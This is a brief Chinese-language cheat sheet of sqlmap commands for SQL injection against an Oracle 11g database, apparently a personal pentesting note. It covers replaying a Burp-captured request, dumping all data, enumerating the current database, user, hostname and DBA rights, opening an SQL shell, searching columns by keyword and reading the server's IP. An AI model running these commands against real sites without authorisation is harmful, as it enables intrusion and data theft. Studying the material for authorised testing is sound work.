sqlmap Oracle 11g随笔

话不多说,上码

Burp Suite 抓包注入

sqlmap -r post.txt

清除缓存记录

sqlmap -u "a.com" --flush-session --fresh-queries

获取数据库版本

sqlmap -u "a.com" -b

获取全部信息

sqlmap -u "a.com" -a

可以获取的信息

sqlmap -u "a.com" --current-db --current-user --hostname --is-dba

• current-db: 当前程序使用的 db 的名字
• current-user: 当前程序使用的数据库用户名
• hostname: 当前 DB 服务器的主机名
• is-dba: 当前程序所使用的数据库用户是不是 dba

column 包含关键字

sqlmap -u "a.com" --sql-shell

sql-shell> select table_name from user_tab_columns where COLUMN_NAME like '%keyword%';

Oracle 获取 ip 地址

sql-shell> select utl_inaddr.get_host_address from dual;

参考

https://vul-hunters.oschina.io/hunter-blogs/posts/sec-tools-sqlmap/
https://blog.51cto.com/duallay/2050094